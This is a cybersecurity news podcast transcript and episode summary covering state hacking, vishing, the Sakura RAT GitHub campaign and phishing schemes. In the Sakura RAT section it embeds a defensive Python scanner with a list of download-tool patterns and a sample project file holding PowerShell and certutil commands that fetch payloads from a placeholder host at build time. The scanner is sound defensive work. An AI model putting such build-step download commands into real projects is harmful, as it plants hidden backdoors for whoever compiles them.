
A
From the CISO series. It's Cybersecurity Headlines.
B
These are the cybersecurity headlines for Thursday, June 5, 2025. I'm Rich Stroffolino.

Ukraine Claims Cyberattack on Russian Bomber Maker
Ukraine's HUR intelligence agency claims it successfully conducted a cyber attack against the Russian state-owned aircraft maker Tupolev, accessing over 4 gigabytes of data with internal communications, meeting notes and servicing records for strategic bombers. The agency also claimed to have vandalized the company's website, which remains down at the time of this recording. This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers.

Vishing Campaign Targets Salesforce
Researchers at Google's Threat Intelligence Group disclosed a recent campaign by the threat group UNC6040, which demonstrates repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. These vishing attacks attempt to get staff to load a modified version of Salesforce's Data Loader, usually used for bulk data access on the platform. The attacks use the tool to gain access to Salesforce environments, exfiltrate data and then pivot to other platforms with the information gathered. In some instances, organizations received extortion attempts months after a breach, indicating a partnership with another party, the researchers found. UNC6040 showed signs that it aligns with the cybercrime collective The Com.

Microsoft Lends a Hand to European Governments
Microsoft launched a new program to offer free cybersecurity services to European governments in an effort to bolster their defenses. This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway. The program will consist of three parts: increasing AI-based threat intelligence sharing with European governments, making investments to increase resilience to attacks, and expanding partnerships with governments to better detect and dismantle threat networks.

Lee Enterprises Data Breach Impacts Over 39,000
Back in February, the newspaper group Lee Enterprises suffered a data breach, triggering system outages across much of its network of publications. Now, in a data breach notification with Maine's Attorney General, the company disclosed that the breach resulted in the loss of personally identifiable information on 39,779 individuals, although it was light on what this actually included. Lee never attributed the attack to a threat group, but the Qilin ransomware group took credit on its leak site, claiming to have stolen over 350 GB of data.

And now, thanks to today's episode sponsor, Conveyor
Ever wish you had a teammate that could handle the most annoying parts of customer security reviews? You know, chasing down SMEs for answers, updating systems, coordinating across teams, all the grunt work nobody wants to do, plus having to finish the dang questionnaire itself. Well, that teammate exists. Conveyor just launched Sue, the first AI agent for customer trust. Sue really is the dream teammate. She never misses a deadline, answers every customer request from sales, completes every questionnaire, and knocks out all the coordination in between. Sue handles it all so you don't have to. Learn more at conveyor.com. That's C-O-N-V-E-Y-O-R.

Replay Attacks Bypass Deepfake Detection
A new paper from Resemble AI and a team of European academic researchers shows a new method for getting around existing audio deepfake detectors. Dubbed a replay attack, this involves generating synthetic speech, playing it over speakers and then re-recording it with actual background noise on top. On top-performing deepfake detection models, this approach increased error rates from 4.7% to 18.2%. Retraining the models based on a specific room tone helped a little, with an 11% error rate. The researchers believe this re-recording removes key artifacts that detection models rely on.

Sakura RAT Malware
Researchers at Sophos found a piece of malware hosted on GitHub called Sakura RAT. Initially this appeared to be broken, but the code included a pre-build event that downloads an additional backdoor while compiling. Tracing an email found embedded in the malware, the researchers discovered 133 additional repositories hosting other software with similar silent downloads, ranging from game cheats to hacking tools and crypto utilities. To give an illusion that these projects are actively maintained, the threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination. The payloads varied from backdoors to AsyncRAT and Lumma Stealer.

Booking.com Spoofed
Researchers at Cofense Intelligence spotted a phishing campaign spoofing Booking.com that had been active since at least November 2024. This campaign emails hotel staff asking them to respond to guest-related queries, often with time-sensitive lures. These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a RAT or infostealer. The researchers also found the campaign used cookie consent banners and Cloudflare-style site walls as another means to use ClickFix to download a payload.

FBI Warns About NFT Scheme
A new advisory from the FBI warns about a new NFT airdrop scheme operating on the Hedera Hashgraph network. Threat actors target victims by sending unsolicited NFTs to a wallet, along with memos asking them to click a URL to claim a reward, which instead sends them to a phishing page that asks for a wallet's seed phrase or passwords. This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims. The FBI advises verifying any NFT drops from official sources rather than just emails. And if you're not familiar, Hashgraph is a next-generation distributed ledger introduced in 2018, similar to a blockchain but based on an entirely different protocol aimed at speed, scale and energy efficiency.

We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks. It's a combination effort to make the SOC both efficient and effective. So how can we make sure our threat intelligence is working for us? That's what we're discussing on this week's episode of Defense in Depth. Look for "Improving the Efficiency of Your Threat Intelligence" wherever you get your podcasts.

And if you've got some thoughts about the news from today, or about the show in general, be sure to reach out and drop us a line at feedback@cisoseries.com. We'd love to hear from you. Reporting from the CISO Series, I'm Rich Stroffolino, reminding you to have a super sparkly day.
A
Cybersecurity Headlines are available every weekday. Head to cisoseries.com for the full stories behind the headlines.
B
Sam.
Cyber Security Headlines: Russian Bomber Maker Popped, Vishing Targets Salesforce, MS Helps Out Governments Hosted by CISO Series | Released on June 5, 2025
In this episode of "Cybersecurity Headlines," Rich Stroffolino covers the latest developments in the information security landscape. From state-sponsored cyberattacks to evolving phishing techniques and corporate defenses, this episode provides an overview of the events shaping cybersecurity today.
Timestamp: [00:06]
Ukraine's HUR intelligence agency has announced a successful cyber attack against the Russian state-owned aircraft manufacturer, Tupolev. According to the agency, over 4 gigabytes of data were accessed, including internal communications, meeting notes, and servicing records for strategic bombers. Additionally, the agency asserted that Tupolev's website was vandalized and remains offline at the time of recording.
Rich Stroffolino highlights the timing of this cyber offensive, noting, “This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers” (00:12). This series of attacks underscores the escalating cyber dimension of geopolitical conflicts.
Timestamp: [00:25]
Researchers from Google's Threat Intelligence Group have identified a vishing (voice phishing) campaign run by the threat group UNC6040. The group has had repeated success in breaching corporate networks by impersonating IT support personnel over the phone and persuading employees to install malicious software.
Rich explains, “These vishing attacks attempt to get staff to load a modified version of Salesforce's Data Loader, usually used for bulk data access on the platform” (00:30). Once installed, the tool gives attackers access to Salesforce environments, lets them exfiltrate data, and lets them pivot to other platforms using the information gathered. In some cases, organizations faced extortion attempts months after the breach, which the researchers read as a sign of collaboration with another party; UNC6040 also shows signs of alignment with the cybercrime collective The Com.
Timestamp: [01:15]
In response to increasing cyber threats in Europe, Microsoft has launched a new program offering free cybersecurity services to European governments. The initiative focuses on three areas: increasing AI-based threat intelligence sharing with European governments, investing in resilience against attacks, and expanding partnerships with governments to better detect and dismantle threat networks.
Rich comments, “This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway” (01:20). By leveraging Microsoft's extensive resources and expertise, European governments are better equipped to handle the dynamic nature of cyber threats.
Timestamp: [02:00]
Lee Enterprises, a prominent newspaper group, suffered a data breach in February that caused widespread system outages across its network of publications. In a recent notification to Maine's Attorney General, the company revealed that personally identifiable information (PII) of 39,779 individuals was compromised. The notification said little about what data was involved, and Lee has not attributed the attack to any threat group; the Qilin ransomware group, however, claimed responsibility on its leak site, stating it had stolen over 350 GB of data.
Rich notes, “Although it was light on what this actually included, Lee never attributed the attack to a threat group. But the Qilin ransomware group took credit...” (02:05). This incident highlights the persistent threat ransomware groups pose to media organizations.
Timestamp: [03:00]
A study by Resemble AI and European academic researchers describes a method for circumventing existing audio deepfake detection systems, termed a "replay attack." The technique involves generating synthetic speech, playing it aloud over speakers, and then re-recording it in an environment with real background noise.
Rich explains, “This approach increased error rates from 4.7% to 18.2%” (03:05). By introducing real-world ambient sounds, the replayed audio removes key artifacts that deepfake detectors rely on, making synthetic speech harder to identify. Although retraining models with specific room tones marginally improved detection, the study underscores the need for more robust deepfake defense mechanisms.
Timestamp: [04:00]
Sophos researchers have uncovered a piece of malware on GitHub known as Sakura RAT that initially appeared not to work. On closer inspection, the project contains a pre-build event that downloads an additional backdoor during compilation. Tracing an email address embedded in the malware led to the discovery of 133 further GitHub repositories hosting software with similar silent downloads, ranging from game cheats to hacking tools and crypto utilities.
Rich details, “The threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination” (04:05). The payloads delivered through these repositories vary from backdoors to AsyncRAT and Lumma Stealer. The auto-generated commits give the projects the appearance of active maintenance, lending them credibility with would-be users.
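A defender reviewing repositories like the ones above would want to catch build-step downloads before compiling. The script below is an added example, not Sophos's tooling or code from the original report: it parses an MSBuild project file (.csproj/.vcxproj) and flags PreBuildEvent, PostBuildEvent and Exec commands that contain download primitives; the indicator list and the sample project are constructed for illustration.

```python
"""Flag MSBuild build-event commands that fetch remote content.

Added, constructed example: scans project XML for PreBuildEvent/PostBuildEvent
elements and Exec tasks whose command line looks like a download, the trick
described for the Sakura RAT repositories. Indicator list is hypothetical.
"""
import re
import xml.etree.ElementTree as ET

# Hypothetical download indicators; extend for your environment.
DOWNLOAD_PATTERNS = re.compile(
    r"https?://|Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|\bbitsadmin\b|\bcertutil\b|\bcurl\b|\bwget\b|"
    r"Net\.WebClient|FromBase64String",
    re.IGNORECASE,
)


def _local(tag):
    """Strip the MSBuild XML namespace prefix from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_download_build_events(project_xml):
    """Return (element_kind, command) pairs whose command matches an indicator."""
    root = ET.fromstring(project_xml)
    findings = []
    for el in root.iter():
        kind = _local(el.tag)
        if kind in ("PreBuildEvent", "PostBuildEvent"):
            cmd = (el.text or "").strip()
        elif kind == "Exec":
            cmd = el.get("Command", "").strip()
        else:
            continue
        if cmd and DOWNLOAD_PATTERNS.search(cmd):
            findings.append((kind, cmd))
    return findings


# Constructed sample project: one benign copy step, two download steps.
SAMPLE_CSPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)out\\"</PostBuildEvent>
    <PreBuildEvent>powershell -c "iwr https://example.invalid/p.exe -OutFile $(TEMP)\\p.exe"</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Fetch" BeforeTargets="Build">
    <Exec Command="certutil -urlcache -f https://example.invalid/x.dat x.dat" />
  </Target>
</Project>"""

if __name__ == "__main__":
    for kind, cmd in find_download_build_events(SAMPLE_CSPROJ):
        print(f"[!] {kind}: {cmd}")
```

Run it over every project file in a cloned repository before building; a hit is a reason to read the project by hand, not proof of malice, since legitimate build steps do sometimes fetch packages.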
Timestamp: [05:00]
Cofense Intelligence has identified a phishing campaign spoofing Booking.com that has been active since at least November 2024. Targeting hotel staff, the campaign sends emails posing as guest-related queries with time-sensitive lures. The messages use ClickFix, presenting a fake CAPTCHA challenge to trick recipients into running commands that download malware.
Rich states, “These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a RAT or infostealer” (05:05). Additionally, the campaign employs cookie consent banners and Cloudflare-style site walls as deceptive gateways to payload downloads, enhancing the sophistication of their phishing attempts.
Timestamp: [06:00]
The FBI has issued a warning about a new phishing scheme built around Non-Fungible Tokens (NFTs) on the Hedera Hashgraph network. In this scam, threat actors send unsolicited NFTs to victims' wallets with memos urging them to click a URL to claim a reward. Instead of a reward, victims land on phishing pages designed to capture wallet seed phrases and passwords.
Rich elaborates, “This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims” (06:05). The FBI advises verifying NFT drops through official channels rather than acting on unsolicited messages. Hedera Hashgraph, introduced in 2018, is a distributed ledger similar to a blockchain but built on a different protocol aimed at speed, scale and energy efficiency.
Rich Stroffolino wraps up the episode by emphasizing the role of threat intelligence in building a proactive security posture. He states, “We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks” (06:30). The point is that threat intelligence has to be both efficient and effective to improve Security Operations Centers (SOCs) and overall organizational resilience, which is the topic of this week's Defense in Depth episode.
For more in-depth analysis and daily cybersecurity stories, listeners are encouraged to visit cisoseries.com.
Reporting from the CISO Series, Rich Stroffolino encourages listeners to share their thoughts by reaching out via feedback@cisoseries.com.